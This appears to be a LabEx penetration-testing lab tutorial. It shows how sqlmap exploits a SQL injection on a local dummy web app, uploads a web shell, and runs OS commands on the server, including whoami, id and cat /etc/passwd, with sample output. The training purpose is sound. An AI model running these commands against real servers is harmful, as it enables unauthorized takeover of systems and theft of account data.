LabEx
Log InJoin Free

Execute Operating System Commands with sqlmap

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will explore the powerful capability of sqlmap to execute operating system commands on a target server. This feature is particularly useful in penetration testing scenarios where you have identified a SQL injection vulnerability and want to further compromise the underlying system. You will learn how to use the --os-cmd flag, analyze the output, and understand the limitations of this technique.

Confirm Prerequisites for OS Command Execution

In this step, you will ensure that sqlmap is installed and that you have a basic understanding of how to identify a SQL injection vulnerability. OS command execution through sqlmap typically relies on the ability to write files to the target system (e.g., a web shell) or leverage specific database functions that allow command execution.

First, verify that sqlmap is installed on your system. Open a terminal and type:

sqlmap --version

You should see output similar to this, indicating the version of sqlmap installed:

sqlmap version 1.x.x.x ## Replace x.x.x.x with actual version

Next, we will use sqlmap to detect a SQL injection vulnerability on a local dummy web application. This application is set up to be vulnerable to SQL injection.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --batch --risk=3 --level=3

The --batch flag tells sqlmap to run in non-interactive mode, accepting default choices. --risk=3 and --level=3 increase the depth of tests sqlmap performs, which is often necessary to find more complex vulnerabilities, including those that might allow OS command execution.

After running the command, sqlmap will perform various tests. Look for output indicating that a SQL injection vulnerability has been detected. You might see lines similar to:

---
[INFO] testing connection to the target URL
[INFO] checking if the target is stable
[INFO] target URL is stable
[INFO] testing if GET parameter 'id' is vulnerable to SQL injection
...
[INFO] GET parameter 'id' is vulnerable.
...
---

This confirms that sqlmap has successfully identified a SQL injection vulnerability, which is a prerequisite for attempting OS command execution.

Use the --os-cmd Flag for a Single Command

In this step, you will learn how to use the --os-cmd flag in sqlmap to execute a single operating system command on the target server. This flag is used when sqlmap has identified a way to execute commands, typically by uploading a web shell or leveraging database-specific functions.

The basic syntax for using --os-cmd is:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="<command>" --batch

Replace <command> with the actual OS command you want to execute. sqlmap will attempt to execute this command and return its output.

Let's try to execute a simple command like ls to list files in the current directory where the web application is running.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="ls" --batch

sqlmap will then proceed to:

  1. Detect the SQL injection vulnerability.
  2. Attempt to find a suitable technique for OS command execution (e.g., by uploading a web shell).
  3. Execute the ls command.
  4. Retrieve and display the output of the command.

You will see various sqlmap messages indicating its progress, such as:

...
[INFO] trying to upload a web shell for OS command execution
[INFO] web shell uploaded to '/tmp/web_app/tmpbxxxx.php'
[INFO] executing OS command 'ls'
...

The output of the ls command will be displayed by sqlmap after it successfully executes. This demonstrates the ability to run arbitrary commands on the server.

Execute a Simple Command like whoami or id

In this step, you will execute common Linux commands like whoami and id to gather information about the user and group context under which the web server process is running. This information is crucial for understanding the privileges you have on the compromised system.

First, let's execute the whoami command:

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch

After sqlmap finishes, it will display the output of the whoami command. This will typically be the username under which the web server (e.g., www-data, apache, or labex in our lab environment) is running.

...
[INFO] retrieved OS command output:
labex
...

Next, execute the id command. This command provides more detailed information, including the user ID (UID), group ID (GID), and all groups the user belongs to.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="id" --batch

The output of the id command will look something like this:

...
[INFO] retrieved OS command output:
uid=1000(labex) gid=1000(labex) groups=1000(labex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
...

Analyzing this output helps you understand the permissions available to you. For instance, if the user is part of the sudo group, it might be possible to escalate privileges.

Analyze the Command Output Returned by sqlmap

In this step, you will focus on understanding how sqlmap presents the output of executed OS commands and what to look for. sqlmap retrieves the command output from the web shell it uploads (or other execution methods) and displays it in its console.

When you execute a command using --os-cmd, sqlmap will typically show a line similar to:

[INFO] retrieved OS command output:

Followed by the actual output of the command. For example, if you ran ls -l /tmp, the output might look like:

[INFO] retrieved OS command output:
total 8
-rw-r--r-- 1 labex labex 1234 Jan 1 10:00 somefile.txt
drwxr-xr-x 2 labex labex 4096 Jan 1 10:05 somedir

It's important to carefully read this output. It provides direct insights into the target system. For instance:

  • File listings (ls, dir): Reveal directory structures, file names, and permissions.
  • System information (uname -a, cat /etc/os-release): Provide details about the operating system, kernel version, and distribution.
  • Network configuration (ip a, ifconfig): Show network interfaces, IP addresses, and network configurations.
  • Process lists (ps aux): List running processes, which can indicate other services or applications.

Consider running cat /etc/passwd to see if you can retrieve sensitive system files.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="cat /etc/passwd" --batch

You will see the contents of the /etc/passwd file in the sqlmap output. This file contains user account information and is a common target for reconnaissance.

...
[INFO] retrieved OS command output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/zsh
...

Analyzing this output helps you identify potential users, their home directories, and default shells, which can be useful for further exploitation.

Understand the Limitations of Non-interactive Command Execution

In this step, you will understand the inherent limitations of executing OS commands via sqlmap's --os-cmd flag, particularly its non-interactive nature.

The --os-cmd flag executes a single command and returns its output. It does not provide an interactive shell (like a typical SSH or terminal session). This means:

  1. No persistent session: Each --os-cmd execution is a new, independent request. You cannot run a command, then use its output to inform the next command in the same "session."
  2. No interactive programs: You cannot run programs that require user input or continuous interaction (e.g., nano, vi, top, passwd).
  3. Limited complex operations: Chaining commands with pipes (|) or semicolons (;) is possible, but managing complex workflows or conditional logic becomes cumbersome. For example, ls -l /tmp | grep "file" would work, but a multi-step script requiring user interaction would not.
  4. Error handling: Errors are typically returned as part of the command output, but debugging complex issues can be challenging without an interactive shell.

To overcome these limitations, penetration testers often use --os-shell or --os-pwn in sqlmap (if supported by the underlying database and web server configuration). These flags attempt to establish a semi-interactive or fully interactive shell, allowing for more complex operations. However, --os-cmd is useful for quick reconnaissance or executing single, atomic commands.

For example, try to execute a command that would typically require interaction, like nano.

sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="nano" --batch

You will likely see an error or no meaningful output, as nano expects a terminal and user input, which sqlmap cannot provide in this non-interactive mode.

...
[INFO] retrieved OS command output:
Error opening terminal: unknown.
...

This demonstrates that while powerful for single commands, --os-cmd is not a substitute for a full interactive shell.

Summary

In this lab, you have successfully learned how to execute operating system commands on a target server using sqlmap's --os-cmd flag. You started by confirming the prerequisites, then practiced executing simple commands like ls, whoami, id, and cat /etc/passwd. You also gained an understanding of how to analyze the command output returned by sqlmap and, importantly, recognized the limitations of non-interactive command execution. This skill is fundamental for post-exploitation phases in web application penetration testing.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux